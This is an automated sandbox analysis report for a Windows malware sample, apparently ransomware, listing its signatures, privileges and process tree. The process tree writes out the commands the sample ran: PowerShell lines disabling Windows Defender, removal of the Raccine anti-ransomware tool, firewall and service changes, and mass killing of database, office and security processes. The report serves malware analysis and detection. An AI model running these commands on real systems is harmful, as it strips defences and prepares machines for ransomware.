2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
19s
max time network
150s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Size

367KB
MD5

b31f6216e6bc5a6291a0b82de0377553
SHA1

0afdc5359268f7e78a0ca3c3c67752edd304a742
SHA256

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb
SHA512

7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6

Score

10^/10

discovery evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
4492	icacls.exe
1072	icacls.exe
5268	icacls.exe
2504	icacls.exe
1596	icacls.exe
5856	icacls.exe
4552	icacls.exe
1636	icacls.exe
5256	icacls.exe
5208	icacls.exe
4380	icacls.exe
5740	icacls.exe
4884	icacls.exe
5336	icacls.exe
4960	icacls.exe
4076	icacls.exe
4556	icacls.exe
5232	icacls.exe
6008	icacls.exe
904	icacls.exe
5236	icacls.exe
4416	icacls.exe
2604	icacls.exe
6096	icacls.exe
3120	icacls.exe
2624	icacls.exe
5364	icacls.exe
4932	icacls.exe
4384	icacls.exe
5936	icacls.exe
5304	icacls.exe
1116	icacls.exe
5764	icacls.exe
5664	icacls.exe
5584	icacls.exe
5224	icacls.exe
5424	icacls.exe
4436	icacls.exe
1160	icacls.exe
4452	icacls.exe
6052	icacls.exe
4128	icacls.exe
5768	icacls.exe
4240	icacls.exe
5864	icacls.exe
2624	icacls.exe
2620	icacls.exe
5172	icacls.exe
5816	icacls.exe
3532	icacls.exe
2260	icacls.exe
5276	icacls.exe
5536	icacls.exe
1596	icacls.exe
4476	icacls.exe
5956	icacls.exe
5152	icacls.exe
4488	icacls.exe
1072	icacls.exe
3800	icacls.exe
5384	icacls.exe
5408	icacls.exe
3816	icacls.exe
4328	icacls.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
3788	taskkill.exe
4172	taskkill.exe
5800	taskkill.exe
4496	taskkill.exe
3524	taskkill.exe
4280	taskkill.exe
5560	taskkill.exe
4072	taskkill.exe
3364	taskkill.exe
5912	taskkill.exe
396	taskkill.exe
4736	taskkill.exe
5048	taskkill.exe
4020	taskkill.exe
4832	taskkill.exe
2500	taskkill.exe
5496	taskkill.exe
2164	taskkill.exe
4632	taskkill.exe
1596	taskkill.exe
4144	taskkill.exe
4212	taskkill.exe
2604	taskkill.exe
4544	taskkill.exe
4592	taskkill.exe
4252	taskkill.exe
2604	taskkill.exe
3312	taskkill.exe
1616	taskkill.exe
4984	taskkill.exe
2876	taskkill.exe
4880	taskkill.exe
4908	taskkill.exe
4780	taskkill.exe
5504	taskkill.exe
4492	taskkill.exe
6104	taskkill.exe
2420	taskkill.exe
5012	taskkill.exe
5168	taskkill.exe
5856	taskkill.exe
4668	taskkill.exe
5060	taskkill.exe
4452	taskkill.exe
2988	taskkill.exe
4836	taskkill.exe
4308	taskkill.exe
4148	taskkill.exe
5724	taskkill.exe
4632	taskkill.exe
1264	taskkill.exe
6092	taskkill.exe
2848	taskkill.exe
4896	taskkill.exe
2212	taskkill.exe
5016	taskkill.exe
4436	taskkill.exe
4124	taskkill.exe
5992	taskkill.exe
5052	taskkill.exe
496	taskkill.exe
4976	taskkill.exe
4452	taskkill.exe
2620	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
1584	reg.exe
5780	reg.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
4132	PING.EXE
4152	PING.EXE
3752	PING.EXE
6040	PING.EXE
4176	PING.EXE
4500	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

pid	Process
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exepowershell.exepowershell.exesc.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exebackgroundTaskHost.exetaskkill.exe5wzwhgdn.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeIncreaseQuotaPrivilege	1424	powershell.exe
Token: SeSecurityPrivilege	1424	powershell.exe
Token: SeTakeOwnershipPrivilege	1424	powershell.exe
Token: SeLoadDriverPrivilege	1424	powershell.exe
Token: SeSystemProfilePrivilege	1424	powershell.exe
Token: SeSystemtimePrivilege	1424	powershell.exe
Token: SeProfSingleProcessPrivilege	1424	powershell.exe
Token: SeIncBasePriorityPrivilege	1424	powershell.exe
Token: SeCreatePagefilePrivilege	1424	powershell.exe
Token: SeBackupPrivilege	1424	powershell.exe
Token: SeRestorePrivilege	1424	powershell.exe
Token: SeShutdownPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeSystemEnvironmentPrivilege	1424	powershell.exe
Token: SeRemoteShutdownPrivilege	1424	powershell.exe
Token: SeUndockPrivilege	1424	powershell.exe
Token: SeManageVolumePrivilege	1424	powershell.exe
Token: 33	1424	powershell.exe
Token: 34	1424	powershell.exe
Token: 35	1424	powershell.exe
Token: 36	1424	powershell.exe
Token: SeDebugPrivilege	2616	sc.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Token: SeDebugPrivilege	4304	backgroundTaskHost.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	4396	5wzwhgdn.exe
Token: SeDebugPrivilege	4520	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

description	pid	Process	procid_target
PID 3368 wrote to memory of 2996	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	76
PID 3368 wrote to memory of 2996	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	76
PID 3368 wrote to memory of 1424	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	78
PID 3368 wrote to memory of 1424	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	78
PID 3368 wrote to memory of 2616	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	353
PID 3368 wrote to memory of 2616	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	353
PID 3368 wrote to memory of 3940	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	83
PID 3368 wrote to memory of 3940	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	83
PID 3368 wrote to memory of 2628	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	234
PID 3368 wrote to memory of 2628	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	234
PID 3368 wrote to memory of 3012	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	87
PID 3368 wrote to memory of 3012	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	87
PID 3368 wrote to memory of 3996	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	89
PID 3368 wrote to memory of 3996	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	89
PID 3368 wrote to memory of 2928	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	94
PID 3368 wrote to memory of 2928	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	94
PID 3368 wrote to memory of 2648	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	92
PID 3368 wrote to memory of 2648	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	92
PID 3368 wrote to memory of 4104	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	95
PID 3368 wrote to memory of 4104	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	95
PID 3368 wrote to memory of 4228	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	97
PID 3368 wrote to memory of 4228	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	97
PID 3368 wrote to memory of 4304	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	278
PID 3368 wrote to memory of 4304	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	278
PID 3368 wrote to memory of 4396	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	319
PID 3368 wrote to memory of 4396	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	319
PID 3368 wrote to memory of 4520	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	103
PID 3368 wrote to memory of 4520	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	103
PID 3368 wrote to memory of 4632	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	471
PID 3368 wrote to memory of 4632	3368	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	471

C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  PID:2616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4520
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  PID:4632
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:5020
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1584
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4280
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:4736
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:3576
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1264
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4872
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:4112
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4192
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4568
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:4860
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4868
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:2848
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  PID:4732
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:2620
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  PID:4552
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:2604
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  PID:2420
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4452
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:3364
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:5052
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:4544
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  PID:4412
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  PID:4992
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:4312
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  PID:4988
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:1616
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:4908
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:4148
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:4592
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  PID:764
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  PID:2660
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  PID:4964
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:1264
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:4780
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:3524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  PID:2584
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  PID:5036
